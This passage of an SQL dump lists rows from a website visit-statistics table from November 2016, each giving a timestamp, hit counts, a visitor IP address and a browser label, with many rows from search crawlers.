165','chrome'),(74099,1478816102,1,1,0,0,'66.102.9.29','other'),(74100,1478817866,1,1,0,0,'62.216.59.247','chrome'),(74101,1478818360,2,2,0,0,'80.91.162.98','other'),(74102,1478819698,1,1,0,0,'40.77.167.39','other'),(74103,1478820274,1,1,0,0,'66.102.9.29','other'),(74104,1478821155,6,6,0,0,'198.245.49.215','other'),(74105,1478821431,1,0,1,0,'66.249.76.13',''),(74106,1478824485,1,1,0,0,'40.77.167.39','other'),(74107,1478827237,1,1,0,0,'40.77.167.39','other'),(74108,1478829229,1,1,0,0,'157.55.39.184','other'),(74109,1478830480,2,0,2,0,'68.180.230.220',''),(74110,1478830600,1,1,0,0,'207.46.13.110','other'),(74111,1478830608,1,1,0,0,'217.69.133.68','other'),(74112,1478830835,1,1,0,0,'66.249.76.15','chrome'),(74113,1478831960,1,1,0,0,'157.55.39.41','other'),(74114,1478831973,1,1,0,0,'66.102.9.29','other'),(74115,1478832192,1,0,1,0,'68.180.230.220',''),(74116,1478834297,1,1,0,0,'157.55.39.41','other'),(74117,1478835369,1,1,0,0,'66.102.9.29','other'),(74118,1478836766,1,1,0,0,'180.76.15.162','other'),(74119,1478838723,1,1,0,0,'66.249.76.13','chrome'),(74120,1478838775,1,1,0,0,'180.76.15.145','other'),(74121,1478839901,1,0,1,0,'66.249.76.14',''),(74122,1478842738,1,1,0,0,'66.102.9.29','other'),(74123,1478845198,1,1,0,0,'66.102.9.25','other'),(74124,1478845356,1,1,0,0,'180.76.15.154','other'),(74125,1478845609,1,1,0,0,'91.196.178.70','firefox'),(74126,1478846630,1,1,0,0,'130.193.50.34','other'),(74127,1478847428,1,1,0,0,'37.55.150.75','firefox'),(74128,1478847996,1,1,0,0,'66.249.93.141','chrome'),(74129,1478848114,1,1,0,0,'217.69.133.223','other'),(74130,1478849746,1,1,0,0,'91.196.178.132','firefox'),(74131,1478849940,1,1,0,0,'217.69.133.218','other'),(74132,1478849999,1,1,0,0,'66.102.9.25','other'),(74133,1478851442,1,1,0,0,'157.55.39.41','other'),(74134,1478851819,1,1,0,0,'46.200.75.98','firefox'),(74135,1478851846,1,1,0,0,'91.196.178.70','firefox'),(74136,1478853031,1,1,0,0,'217.69.133.222','other'),(74137,1478853206,1,1,0,0,'46.219.18.132','chrome'),(74138,1478853399,1,1,0,0,'66.102.9.25','other'),(74139,1478853921,1,1,0,0,'46.211.112.213','chrome'),(74140,1478854176,1,1,0,0,'178.137.164.171','firefox'),(74141,1478854431,1,1,0,0,'180.76.15.157','other'),(74142,1478855814,1,1,0,0,'217.69.133.5','other'),(74143,1478855901,1,1,0,0,'49.146.209.182','firefox'),(74144,1478855988,2,2,0,0,'91.196.177.46','firefox'),(74145,1478856695,1,1,0,0,'91.196.178.70','firefox'),(74146,1478856747,1,1,0,0,'91.196.178.70','chrome'),(74147,1478857207,1,1,0,0,'66.102.9.25','other'),(74148,1478858020,1,1,0,0,'91.196.178.68','firefox'),(74149,1478858700,1,1,0,0,'66.249.76.108','chrome'),(74150,1478859552,1,1,0,0,'109.227.113.34','chrome'),(74151,1478859975,1,1,0,0,'37.53.136.72','chrome'),(74152,1478860912,1,1,0,0,'40.77.167.41','other'),(74153,1478861142,1,1,0,0,'31.43.4.151','chrome'),(74154,1478861620,1,1,0,0,'91.196.178.70','firefox'),(74155,1478861947,1,1,0,0,'178.95.221.227','chrome'),(74156,1478862338,1,0,1,0,'66.249.76.15',''),(74157,1478864805,1,1,0,0,'66.102.9.29','other'),(74158,1478865900,1,1,0,0,'94.178.147.116','firefox'),(74159,1478866628,2,2,0,0,'162.210.196.130','other'),(74160,1478867587,1,1,0,0,'178.94.15.148','firefox'),(74161,1478868555,1,1,0,0,'141.8.142.25','other'),(74162,1478868931,1,1,0,0,'130.193.51.74','other'),(74163,1478869358,1,1,0,0,'141.8.142.155','other'),(74164,1478869363,1,1,0,0,'141.8.142.85','other'),(74165,1478871692,1,1,0,0,'66.102.9.29','other'),(74166,1478875217,1,1,0,0,'194.44.31.222','chrome'),(74167,1478875298,1,1,0,0,'66.102.9.29','other'),(74168,1478875531,1,1,0,0,'195.211.173.159','chrome'),(74169,1478876820,1,1,0,0,'91.196.178.68','firefox'),(74170,1478877255,1,1,0,0,'91.196.177.15','chrome'),(74171,1478877600,1,1,0,0,'207.46.13.110','other'),(74172,1478878642,1,1,0,0,'91.196.178.164','chrome'),(74173,1478879181,1,1,0,0,'66.102.9.25','other'),(74174,1478881583,1,1,0,0,'40.77.167.39','other'),(74175,1478884203,1,1,0,0,'157.55.39.41','other'),(74176,1478884261,1,1,0,0,'94.179.117.26','chrome'),(74177,1478884564,1,0,1,0,'66.249.76.13',''),(74178,1478884913,1,0,1,0,'66.249.66.87',''),(74179,1478886443,1,1,0,0,'157.55.39.41','other'),(74180,1478886536,1,1,0,0,'66.102.9.25','other'),(74181,1478886934,1,1,0,0,'82.145.220.185','chrome'),(74182,1478886956,1,1,0,0,'82.145.222.21','other'),(74183,1478887401,1,1,0,0,'40.77.167.41','other'),(74184,1478889002,1,1,0,0,'195.88.158.126','firefox'),(74185,1478889659,1,1,0,0,'66.102.9.27','other'),(74186,1478889835,1,0,1,0,'66.249.76.14',''),(74187,1478890009,1,0,1,0,'66.249.66.87',''),(74188,1478890029,1,1,0,0,'46.211.4.250','other'),(74189,1478893085,1,1,0,0,'94.179.106.3','other'),(74190,1478893243,1,1,0,0,'66.102.9.27','other'),(74191,1478894122,1,1,0,0,'157.55.39.41','other'),(74192,1478897075,1,1,0,0,'174.129.237.157','other'),(74193,1478897095,1,1,0,0,'5.255.253.30','other'),(74194,1478897155,1,1,0,0,'91.196.178.103','chrome'),(74195,1478897182,1,1,0,0,'5.255.253.36','other'),(74196,1478897255,1,1,0,0,'141.8.183.25','other'),(74197,1478897752,1,1,0,0,'66.102.9.25','other'),(74198,1478898510,1,1,0,0,'217.69.133.203','other'),(74199,1478899068,1,0,1,0,'66.249.76.14',''),(74200,1478899166,1,0,1,0,'66.249.76.15',''),(74201,1478899297,1,1,0,0,'188.244.47.215','chrome'),(74202,1478899926,1,0,1,0,'66.249.76.107',''),(74203,1478900443,2,2,0,0,'174.129.237.157','other'),(74204,1478900455,1,1,0,0,'66.102.9.27','other'),(74205,1478902256,1,1,0,0,'174.129.237.157','other'),(74206,1478902587,1,1,0,0,'180.76.15.29','other'),(74207,1478902588,1,1,0,0,'180.76.15.22','other'),(74208,1478904054,1,1,0,0,'66.102.9.25','other'),(74209,1478904411,1,1,0,0,'37.54.115.30','chrome'),(74210,1478904586,1,0,1,0,'66.249.66.197',''),(74211,1478904950,1,0,1,0,'66.249.66.81',''),(74212,1478905543,1,0,1,0,'66.249.76.13',''),(74213,1478906883,1,0,1,0,'66.249.66.197',''),(74214,1478907289,2,0,2,0,'66.249.66.202',''),(74215,1478907458,2,2,0,0,'91.121.109.55','other'),(74216,1478907493,1,0,1,0,'66.249.76.109',''),(74217,1478907897,1,1,0,0,'66.102.9.25','other'),(74218,1478908107,1,0,1,0,'66.249.76.108',''),(74219,1478909333,1,1,0,0,'66.249.66.84','chrome'),(74220,1478909527,1,0,1,0,'66.249.76.15',''),(74221,1478909565,1,1,0,0,'40.77.167.41','other'),(74222,1478909680,2,1,1,0,'62.210.83.88',''),(74223,1478910692,1,0,1,0,'66.249.76.15',''),(74224,1478910767,1,0,1,0,'66.249.76.108',''),(74225,1478911704,1,1,0,0,'66.102.9.27','other'),(74226,1478912575,1,0,1,0,'66.249.76.15',''),(74227,1478912866,1,0,1,0,'66.249.76.14',''),(74228,1478914807,1,1,0,0,'40.77.167.61','other'),(74229,1478914880,1,1,0,0,'66.102.9.27','other'),(74230,1478916826,1,1,0,0,'217.69.133.224','other'),(74231,1478918053,1,0,1,0,'66.249.66.183',''),(74232,1478919367,1,0,1,0,'66.249.76.14',''),(74233,1478920258,1,1,0,0,'66.102.9.25','other'),(74234,1478922065,1,1,0,0,'66.102.9.27','other'),(74235,1478924878,1,1,0,0,'40.77.167.39','other'),(74236,1478925143,1,1,0,0,'217.69.133.215','other'),(74237,1478925650,1,1,0,0,'66.102.9.25','other'),(74238,1478926238,2,0,2,0,'66.249.76.14',''),(74239,1478926869,1,1,0,0,'217.69.133.219','other'),(74240,1478927263,1,1,0,0,'82.145.222.126','other'),(74241,1478928959,1,0,1,0,'66.249.76.13',''),(74242,1478929669,1,1,0,0,'66.102.9.25','other'),(74243,1478931786,1,1,0,0,'40.77.167.39','other'),(74244,1478932585,2,2,0,0,'95.213.141.126','opera'),(74245,1478932763,1,0,1,0,'68.180.230.220',''),(74246,1478932858,1,1,0,0,'66.102.9.25','other'),(74247,1478933924,1,1,0,0,'37.140.189.215','chrome'),(74248,1478933943,1,1,0,0,'130.193.50.34','other'),(74249,1478936293,1,0,1,0,'66.249.76.109',''),(74250,1478936330,1,0,1,0,'66.249.76.13',''),(74251,1478936606,1,0,1,0,'66.249.76.14',''),(74252,1478936945,1,1,0,0,'66.102.9.29','other'),(74253,1478937457,1,0,1,0,'66.249.66.84',''),(74254,1478938160,1,0,1,0,'66.249.76.108',''),(74255,1478939802,1,0,1,0,'66.249.76.14',''),(74256,1478940413,1,1,0,0,'130.193.50.4','other'),(74257,1478940514,1,1,0,0,'141.8.183.25','other'),(74258,1478940572,1,1,0,0,'66.102.9.25','other'),(74259,1478940611,1,1,0,0,'66.249.93.141','chrome'),(74260,1478941466,1,1,0,0,'163.172.66.63','other'),(74261,1478941886,1,1,0,0,'141.8.183.25','other'),(74262,1478941966,2,0,2,0,'66.249.76.14',''),(74263,1478942021,2,0,2,0,'66.249.66.84',''),(74264,1478942083,1,1,0,0,'40.77.167.39','other'),(74265,1478942126,1,0,1,0,'66.249.76.15',''),(74266,1478942603,1,1,0,0,'163.172.65.43','other'),(74267,1478942663,1,1,0,0,'163.172.66.13','other'),(74268,1478943013,1,1,0,0,'163.172.65.236','other'),(74269,1478943199,1,1,0,0,'163.172.65.60','other'),(74270,1478943484,1,1,0,0,'163.172.66.18','other'),(74271,1478943575,1,1,0,0,'163.172.66.92','other'),(74272,1478943746,1,1,0,0,'163.172.65.226','other'),(74273,1478943889,1,1,0,0,'163.172.66.102','other'),(74274,1478943982,1,1,0,0,'66.102.9.29','other'),(74275,1478944287,1,0,1,0,'66.249.76.14',''),(74276,1478944432,1,1,0,0,'163.172.66.138','other'),(74277,1478945620,1,1,0,0,'163.172.66.157','other'),(74278,1478945659,1,1,0,0,'163.172.65.57','other'),(74279,1478945903,1,1,0,0,'163.172.64.233','other'),(74280,1478945931,1,1,0,0,'163.172.66.53','other'),(74281,1478946069,1,1,0,0,'163.172.66.18','other'),(74282,1478946509,1,1,0,0,'163.172.65.236','other'),(74283,1478946538,1,1,0,0,'163.172.64.224','other'),(74284,1478946791,1,0,1,0,'66.249.76.14',''),(74285,1478946906,1,1,0,0,'163.172.66.112','other'),(74286,1478947620,1,1,0,0,'163.172.65.31','other'),(74287,1478947646,1,1,0,0,'163.172.65.207','other'),(74288,1478947707,1,1,0,0,'163.172.65.34','other'),(74289,1478947846,1,1,0,0,'66.102.9.25','other'),(74290,1478948206,1,1,0,0,'163.172.66.93','other'),(74291,1478948266,1,1,0,0,'66.249.76.13','chrome'),(74292,1478948543,2,0,2,0,'66.249.76.14',''),(74293,1478948646,1,1,0,0,'163.172.65.195','other'),(74294,1478949064,1,1,0,0,'163.172.64.222','other'),(74295,1478949271,1,1,0,0,'163.172.66.84','other'),(74296,1478949275,1,1,0,0,'163.172.65.111','other'),(74297,1478949434,1,1,0,0,'163.172.64.237','other'),(74298,1478949508,1,1,0,0,'163.172.65.68','other'),(74299,1478949661,1,1,0,0,'163.172.64.186','other'),(74300,1478949925,1,1,0,0,'163.172.66.96','other'),(74301,1478950132,1,1,0,0,'163.172.66.157','other'),(74302,1478950619,1,0,1,0,'66.249.66.81',''),(74303,1478950709,1,1,0,0,'66.249.76.14','chrome'),(74304,1478951032,1,1,0,0,'163.172.65.188','other'),(74305,1478951508,1,1,0,0,'66.249.76.15','chrome'),(74306,1478951955,1,1,0,0,'163.172.66.71','other'),(74307,1478952335,1,0,1,0,'66.249.76.13',''),(74308,1478952540,1,1,0,0,'163.172.65.67','other'),(74309,1478952671,1,1,0,0,'66.249.66.177','chrome'),(74310,1478952756,1,0,1,0,'66.249.76.15',''),(74311,1478952840,1,1,0,0,'163.172.65.16','other'),(74312,1478952959,1,1,0,0,'163.172.66.184','other'),(74313,1478953032,1,1,0,0,'163.172.66.96','other'),(74314,1478954159,1,1,0,0,'163.172.65.180','other'),(74315,1478954920,1,1,0,0,'163.172.65.44','other'),(74316,1478954963,1,1,0,0,'163.172.66.98','other'),(74317,1478955020,1,1,0,0,'217.69.133.221','other'),(74318,1478955248,1,0,1,0,'66.249.66.177',''),(74319,1478955317,1,1,0,0,'163.172.65.191','other'),(74320,1478956625,1,1,0,0,'180.76.15.14','other'),(74321,1478956744,1,0,1,0,'66.249.76.13',''),(74322,1478959277,1,0,1,0,'66.249.76.15',''),(74323,1478960162,1,0,1,0,'66.249.66.87',''),(74324,1478960468,1,0,1,0,'66.249.76.107',''),(74325,1478961076,1,1,0,0,'66.102.9.29','chrome'),(74326,1478961942,1,1,0,0,'66.249.66.84','chrome'),(74327,1478964130,1,1,0,0,'94.179.209.79','firefox'),(74328,1478964527,1,0,1,0,'66.249.76.13',''),(74329,1478965267,1,0,1,0,'66.249.76.109',''),(74330,1478966273,1,0,1,0,'66.249.76.14',''),(74331,1478966345,1,1,0,0,'40.77.167.39','other'),(74332,1478968563,1,0,1,0,'66.249.76.13',''),(74333,1478968565,1,0,1,0,'66.249.76.14',''),(74334,1478969046,1,0,1,0,'66.249.66.81',''),(74335,1478969514,1,1,0,0,'91.196.178.165','chrome'),(74336,1478969697,1,1,0,0,'180.76.15.143','other'),(74337,1478970173,1,0,1,0,'66.249.76.13',''),(74338,1478971440,1,1,0,0,'157.55.39.146','other'),(74339,1478972365,1,1,0,0,'163.172.65.106','other'),(74340,1478972480,1,1,0,0,'163.172.65.35','other'),(74341,1478972894,1,0,1,0,'66.249.76.15',''),(74342,1478973138,1,0,1,0,'66.249.76.13',''),(74343,1478973649,1,1,0,0,'163.172.66.121','other'),(74344,1478973913,1,1,0,0,'157.55.39.146','other'),(74345,1478974012,1,1,0,0,'163.172.64.189','other'),(74346,1478974013,1,1,0,0,'163.172.65.227','other'),(74347,1478974487,1,1,0,0,'163.172.66.88','other'),(74348,1478974570,1,1,0,0,'163.172.66.184','other'),(74349,1478974620,1,0,1,0,'66.249.76.107',''),(74350,1478974786,1,1,0,0,'163.172.66.141','other'),(74351,1478974791,1,1,0,0,'163.172.65.108','other'),(74352,1478974934,1,1,0,0,'163.172.66.162','other'),(74353,1478975592,1,1,0,0,'163.172.65.59','other'),(74354,1478975768,1,1,0,0,'163.172.65.32','other'),(74355,1478976346,1,0,1,0,'66.249.76.15',''),(74356,1478976659,1,1,0,0,'94.179.209.79','firefox'),(74357,1478976792,1,1,0,0,'163.172.65.39','other'),(74358,1478977064,1,1,0,0,'163.172.65.201','other'),(74359,1478977187,1,1,0,0,'163.172.66.72','other'),(74360,1478978212,1,0,1,0,'66.249.66.84',''),(74361,1478978532,1,1,0,0,'163.172.65.14','other'),(74362,1478978758,1,1,0,0,'163.172.65.226','other'),(74363,1478978950,1,1,0,0,'163.172.66.49','other'),(74364,1478979512,1,1,0,0,'163.172.66.16','other'),(74365,1478979690,1,1,0,0,'163.172.66.108','other'),(74366,1478980190,1,1,0,0,'46.211.252.161','chrome'),(74367,1478980268,1,1,0,0,'163.172.64.243','other'),(74368,1478980373,1,1,0,0,'163.172.66.62','other'),(74369,1478980492,1,1,0,0,'163.172.65.18','other'),(74370,1478980873,1,0,1,0,'68.180.230.220',''),(74371,1478981060,1,1,0,0,'163.172.66.91','other'),(74372,1478981387,1,1,0,0,'163.172.66.98','other'),(74373,1478981748,1,1,0,0,'163.172.66.87','other'),(74374,1478982166,1,0,1,0,'66.249.76.15',''),(74375,1478982726,1,1,0,0,'157.55.39.146','other'),(74376,1478983313,1,1,0,0,'157.55.39.41','other'),(74377,1478983550,1,1,0,0,'163.172.66.31','other'),(74378,1478983663,1,1,0,0,'217.69.133.229','other'),(74379,1478983781,1,1,0,0,'163.172.66.87','other'),(74380,1478984144,2,1,1,0,'62.210.83.88',''),(74381,1478984160,1,0,1,0,'66.249.66.81',''),(74382,1478984703,1,0,1,0,'66.249.76.13',''),(74383,1478985103,1,1,0,0,'163.172.65.131','other'),(74384,1478985366,1,1,0,0,'163.172.65.180','other'),(74385,1478985789,1,0,1,0,'66.249.76.14',''),(74386,1478986002,1,1,0,0,'163.172.66.159','other'),(74387,1478986221,1,1,0,0,'163.172.66.111','other'),(74388,1478987074,1,1,0,0,'130.193.50.34','other'),(74389,1478987234,1,1,0,0,'163.172.65.222','other'),(74390,1478987582,1,1,0,0,'163.172.65.202','other'),(74391,1478987656,1,1,0,0,'163.172.64.229','other'),(74392,1478988211,1,0,1,0,'66.249.76.14',''),(74393,1478988497,1,0,1,0,'66.249.76.108',''),(74394,1478988654,1,1,0,0,'163.172.65.33','other'),(74395,1478989133,1,1,0,0,'163.172.65.225','other'),(74396,1478989312,1,1,0,0,'163.172.65.123','other'),(74397,1478989581,1,1,0,0,'163.172.65.32','other'),(74398,1478989963,1,0,1,0,'66.249.76.14',''),(74399,1478990314,1,0,1,0,'66.249.76.15',''),(74400,1478991583,1,1,0,0,'163.172.65.220','other'),(74401,1478991835,1,1,0,0,'163.172.65.189','other'),(74402,1478992013,1,1,0,0,'163.172.66.129','other'),(74403,1478992118,1,1,0,0,'163.172.66.100','other'),(74404,1478992156,1,1,0,0,'163.172.66.85','other'),(74405,1478992259,1,1,0,0,'163.172.66.91','other'),(74406,1478993159,1,1,0,0,'40.77.167.8','other'),(74407,1478993257,1,1,0,0,'163.172.64.231','other'),(74408,1478993323,1,1,0,0,'163.172.66.177','other'),(74409,1478993543,1,0,1,0,'66.249.76.15',''),(74410,1478993846,1,1,0,0,'163.172.65.225','other'),(74411,1478994021,1,0,1,0,'66.249.76.13',''),(74412,1478994724,1,1,0,0,'163.172.64.241','other'),(74413,1478995173,1,1,0,0,'163.172.65.108','other'),(74414,1478995502,1,1,0,0,'163.172.66.48','other'),(74415,1478995991,1,1,0,0,'163.172.65.58','other'),(74416,1478996637,1,1,0,0,'163.172.66.162','other'),(74417,1478996640,1,1,0,0,'163.172.65.59','other'),(74418,1478996686,1,1,0,0,'163.172.65.20','other'),(74419,1478996690,1,0,1,0,'66.249.76.13',''),(74420,1478996901,1,0,1,0,'66.249.76.108',''),(74421,1478996918,1,1,0,0,'157.55.39.101','other'),(74422,1478997087,1,1,0,0,'163.172.66.144','other'),(74423,1478997188,1,1,0,0,'163.172.65.127','other'),(74424,1478997928,1,1,0,0,'163.172.65.219','other'),(74425,1478998136,1,0,1,0,'68.180.230.220',''),(74426,1478998139,1,1,0,0,'163.172.64.199','other'),(74427,1478999206,1,1,0,0,'163.172.66.69','other'),(74428,1479000038,1,1,0,0,'163.172.66.151','other'),(74429,1479000258,1,1,0,0,'163.172.66.57','other'),(74430,1479000705,1,1,0,0,'163.172.66.122','other'),(74431,1479000926,1,1,0,0,'66.249.76.15','chrome'),(74432,1479001110,1,1,0,0,'163.172.65.8','other'),(74433,1479001429,1,0,1,0,'66.249.76.14',''),(74434,1479001539,1,1,0,0,'163.172.65.240','other'),(74435,1479001633,1,1,0,0,'163.172.66.66','other'),(74436,1479002093,1,1,0,0,'163.172.66.23','other'),(74437,1479002201,1,1,0,0,'163.172.66.34','other'),(74438,1479002266,1,1,0,0,'163.172.64.199','other'),(74439,1479002634,1,1,0,0,'163.172.65.8','other'),(74440,1479002767,1,1,0,0,'163.172.64.216','other'),(74441,1479002824,2,0,2,0,'66.249.76.15',''),(74442,1479002853,1,0,1,0,'66.249.76.14',''),(74443,1479003563,1,1,0,0,'163.172.66.31','other'),(74444,1479003769,1,1,0,0,'66.249.76.108','chrome'),(74445,1479004282,1,1,0,0,'163.172.65.123','other'),(74446,1479004722,1,1,0,0,'163.172.65.234','other'),(74447,1479004724,1,1,0,0,'163.172.65.186','other'),(74448,1479004743,1,1,0,0,'91.196.178.100','other'),(74449,1479004829,1,1,0,0,'66.102.9.27','other'),(74450,1479004957,1,1,0,0,'163.172.65.217','other'),(74451,1479005040,1,1,0,0,'163.172.65.109','other'),(74452,1479005568,1,1,0,0,'163.172.65.31','other'),(74453,1479005587,1,1,0,0,'163.172.66.44','other'),(74454,1479005895,1,1,0,0,'163.172.66.100','other'),(74455,1479006286,1,1,0,0,'163.172.65.247','other'),(74456,1479006918,1,1,0,0,'157.55.39.101','other'),(74457,1479007451,1,1,0,0,'163.172.65.64','other'),(74458,1479008088,1,1,0,0,'163.172.65.11','other'),(74459,1479008270,1,1,0,0,'163.172.65.186','other'),(74460,1479009265,1,1,0,0,'163.172.64.179','other'),(74461,1479010089,1,1,0,0,'163.172.66.5','other'),(74462,1479011849,2,0,2,0,'66.249.76.13',''),(74463,1479012208,1,1,0,0,'163.172.66.12','other'),(74464,1479012640,1,0,1,0,'66.249.76.15',''),(74465,1479012687,1,0,1,0,'66.249.76.14',''),(74466,1479013026,1,1,0,0,'163.172.64.179','other'),(74467,1479013537,1,1,0,0,'163.172.66.56','other'),(74468,1479013743,1,1,0,0,'163.172.66.92','other'),(74469,1479013764,1,1,0,0,'163.172.65.120','other'),(74470,1479013821,1,1,0,0,'163.172.65.123','other'),(74471,1479013974,1,1,0,0,'40.77.167.39','other'),(74472,1479015057,1,1,0,0,'157.55.39.146','other'),(74473,1479015064,1,1,0,0,'163.172.66.128','other'),(74474,1479015214,1,1,0,0,'163.172.65.23','other'),(74475,1479015232,1,1,0,0,'163.172.65.120','other'),(74476,1479015345,1,1,0,0,'163.172.66.171','other'),(74477,1479015626,1,1,0,0,'163.172.66.169','other'),(74478,1479016225,1,1,0,0,'157.55.39.146','other'),(74479,1479016560,1,1,0,0,'163.172.65.123','other'),(74480,1479017417,1,1,0,0,'163.172.66.125','other'),(74481,1479017800,1,1,0,0,'163.172.65.229','other'),(74482,1479017973,1,1,0,0,'163.172.65.51','other'),(74483,1479018047,1,1,0,0,'163.172.66.60','other'),(74484,1479018061,1,1,0,0,'163.172.65.208','other'),(74485,1479018308,1,1,0,0,'163.172.65.236','other'),(74486,1479018389,2,2,0,0,'163.172.65.234','other'),(74487,1479019029,1,1,0,0,'163.172.66.128','other'),(74488,1479019401,1,1,0,0,'163.172.65.227','other'),(74489,1479019438,1,1,0,0,'163.172.66.102','other'),(74490,1479019562,1,1,0,0,'163.172.64.193','other'),(74491,1479019763,1,1,0,0,'163.172.64.228','other'),(74492,1479019933,2,2,0,0,'163.172.64.216','other'),(74493,1479020004,1,1,0,0,'163.172.66.32','other'),(74494,1479020116,1,0,1,0,'66.249.76.15',''),(74495,1479020128,1,1,0,0,'163.172.65.45','other'),(74496,1479020270,1,1,0,0,'163.172.66.154','other'),(74497,1479020836,1,1,0,0,'163.172.66.74','other'),(74498,1479021371,1,1,0,0,'163.172.65.219','other'),(74499,1479021843,1,1,0,0,'163.172.65.123','other'),(74500,1479022324,1,1,0,0,'163.172.66.180','other'),(74501,1479022916,1,1,0,0,'163.172.65.243','other'),(74502,1479023900,1,1,0,0,'163.172.65.201','other'),(74503,1479024070,1,1,0,0,'163.172.66.36','other'),(74504,1479024114,1,1,0,0,'163.172.65.53','other'),(74505,1479024255,1,1,0,0,'163.172.64.217','other'),(74506,1479024332,1,1,0,0,'163.172.65.29','other'),(74507,1479024512,1,1,0,0,'163.172.64.183','other'),(74508,1479024706,1,1,0,0,'163.172.66.176','other'),(74509,1479024786,1,1,0,0,'163.172.66.40','other'),(74510,1479025206,1,1,0,0,'163.172.66.123','other'),(74511,1479025706,1,0,1,0,'66.249.76.14',''),(74512,1479025724,1,0,1,0,'66.249.76.13',''),(74513,1479026379,1,1,0,0,'163.172.65.245','other'),(74514,1479026498,1,1,0,0,'174.129.237.157','other'),(74515,1479026922,1,0,1,0,'66.249.76.13',''),(74516,1479026932,1,1,0,0,'163.172.66.51','other'),(74517,1479027004,1,0,1,0,'66.249.76.15',''),(74518,1479027638,1,1,0,0,'174.129.237.157','other'),(74519,1479028119,1,1,0,0,'163.172.65.205','other'),(74520,1479028193,1,1,0,0,'163.172.64.186','other'),(74521,1479028536,1,1,0,0,'163.172.65.191','other'),(74522,1479028624,1,1,0,0,'163.172.65.246','other'),(74523,1479028670,1,1,0,0,'163.172.66.87','other'),(74524,1479029009,1,1,0,0,'174.129.237.157','other'),(74525,1479029344,1,1,0,0,'180.76.15.149','other'),(74526,1479029518,1,1,0,0,'157.55.39.146','other'),(74527,1479029979,1,1,0,0,'163.172.65.128','other'),(74528,1479030121,1,1,0,0,'46.211.2.52','chrome'),(74529,1479030285,1,1,0,0,'163.172.65.66','other'),(74530,1479031028,1,1,0,0,'163.172.65.245','other'),(74531,1479031237,2,2,0,0,'174.129.237.157','other'),(74532,1479031584,1,0,1,0,'66.249.76.107',''),(74533,1479031647,2,2,0,0,'163.172.68.121','other'),(74534,1479031762,1,1,0,0,'163.172.65.247','other'),(74535,1479031850,1,1,0,0,'163.172.65.45','other'),(74536,1479031914,2,0,2,0,'66.249.76.15',''),(74537,1479031968,1,1,0,0,'163.172.66.49','other'),(74538,1479032189,2,2,0,0,'174.129.237.157','other'),(74539,1479032429,1,1,0,0,'163.172.66.24','other'),(74540,1479032630,1,1,0,0,'163.172.66.61','other'),(74541,1479033301,1,1,0,0,'163.172.66.124','other'),(74542,1479034412,1,1,0,0,'163.172.65.13','other'),(74543,1479034591,1,1,0,0,'163.172.64.177','other'),(74544,1479035343,1,0,1,0,'66.249.76.14',''),(74545,1479035991,1,1,0,0,'163.172.66.127','other'),(74546,1479036322,1,1,0,0,'66.102.9.27','other'),(74547,1479036333,1,1,0,0,'66.102.9.29','chrome'),(74548,1479037473,1,1,0,0,'163.172.65.130','other'),(74549,1479037782,1,1,0,0,'157.55.39.146','other'),(74550,1479038927,1,1,0,0,'94.179.209.79','firefox'),(74551,1479039504,1,1,0,0,'66.249.76.15','chrome'),(74552,1479040953,1,1,0,0,'157.55.39.101','other'),(74553,1479041209,1,1,0,0,'66.249.76.14','chrome'),(74554,1479041985,1,1,0,0,'77.121.118.45','chrome'),(74555,1479043608,1,0,1,0,'66.249.76.108',''),(74556,1479043609,1,1,0,0,'91.196.178.38','firefox'),(74557,1479043961,1,1,0,0,'141.0.12.22','other'),(74558,1479045752,1,1,0,0,'157.55.39.146','other'),(74559,1479046006,1,0,1,0,'66.249.76.15',''),(74560,1479047173,1,1,0,0,'46.211.3.180','chrome'),(74561,1479048796,1,1,0,0,'157.55.39.101','other'),(74562,1479048866,1,0,1,0,'66.249.76.13',''),(74563,1479050735,1,1,0,0,'66.102.9.27','other'),(74564,1479051105,1,0,1,0,'66.249.76.14',''),(74565,1479051553,1,1,0,0,'91.196.178.102','chrome'),(74566,1479053431,2,2,0,0,'40.77.167.39','other'),(74567,1479054045,1,1,0,0,'188.235.38.105','chrome'),(74568,1479054065,1,1,0,0,'141.8.183.25','other'),(74569,1479054281,2,2,0,0,'78.26.162.100','other'),(74570,1479055606,1,0,1,0,'66.249.76.13',''),(74571,1479056698,1,0,1,0,'66.249.76.13',''),(74572,1479056732,1,0,1,0,'66.249.76.109',''),(74573,1479057936,1,1,0,0,'66.102.9.29','other'),(74574,1479060420,1,1,0,0,'81.162.232.42','chrome'),(74575,1479060974,1,1,0,0,'163.172.65.29','other'),(74576,1479061348,1,1,0,0,'163.172.66.18','other'),(74577,1479061383,1,1,0,0,'163.172.66.184','other'),(74578,1479061545,1,1,0,0,'66.102.9.29','other'),(74579,1479061803,1,1,0,0,'163.172.66.20','other'),(74580,1479062398,1,1,0,0,'163.172.66.96','other'),(74581,1479062674,1,1,0,0,'163.172.65.221','other'),(74582,1479063427,1,1,0,0,'141.0.12.241','other'),(74583,1479063548,1,0,1,0,'66.249.76.13',''),(74584,1479063614,1,1,0,0,'163.172.66.180','other'),(74585,1479063760,1,1,0,0,'163.172.66.6','other'),(74586,1479064002,1,1,0,0,'163.172.64.254','other'),(74587,1479064595,1,1,0,0,'163.172.65.50','other'),(74588,1479064605,1,1,0,0,'80.70.75.126','chrome'),(74589,1479065102,1,1,0,0,'163.172.65.24','other'),(74590,1479065235,1,0,1,0,'66.249.76.14',''),(74591,1479065481,1,1,0,0,'163.172.66.176','other'),(74592,1479065637,1,1,0,0,'40.77.167.8','other'),(74593,1479065716,1,1,0,0,'163.172.66.22','other'),(74594,1479066295,1,1,0,0,'163.172.65.186','other'),(74595,1479066315,1,1,0,0,'163.172.64.183','other'),(74596,1479066929,1,1,0,0,'163.172.64.192','other'),(74597,1479067220,1,1,0,0,'163.172.64.178','other'),(74598,1479068106,1,1,0,0,'163.172.66.152','other'),(74599,1479068177,1,1,0,0,'163.172.65.185','other'),(74600,1479068465,1,1,0,0,'163.172.66.24','other'),(74601,1479070011,1,1,0,0,'163.172.66.58','other'),(74602,1479070420,1,1,0,0,'163.172.66.3','other'),(74603,1479070675,1,1,0,0,'163.172.66.4','other'),(74604,1479070879,1,1,0,0,'163.172.64.199','other'),(74605,1479071107,1,1,0,0,'157.55.39.235','other'),(74606,1479075613,1,1,0,0,'163.172.66.46','other'),(74607,1479075710,1,1,0,0,'163.172.66.155','other'),(74608,1479075847,1,1,0,0,'163.172.65.55','other'),(74609,1479076078,1,1,0,0,'163.172.66.89','other'),(74610,1479076107,1,1,0,0,'163.172.65.6','other'),(74611,1479076644,1,1,0,0,'163.172.66.141','other'),(74612,1479076911,1,1,0,0,'163.172.64.181','other'),(74613,1479076975,1,1,0,0,'163.172.65.232','other'),(74614,1479077093,2,2,0,0,'163.172.66.147','other'),(74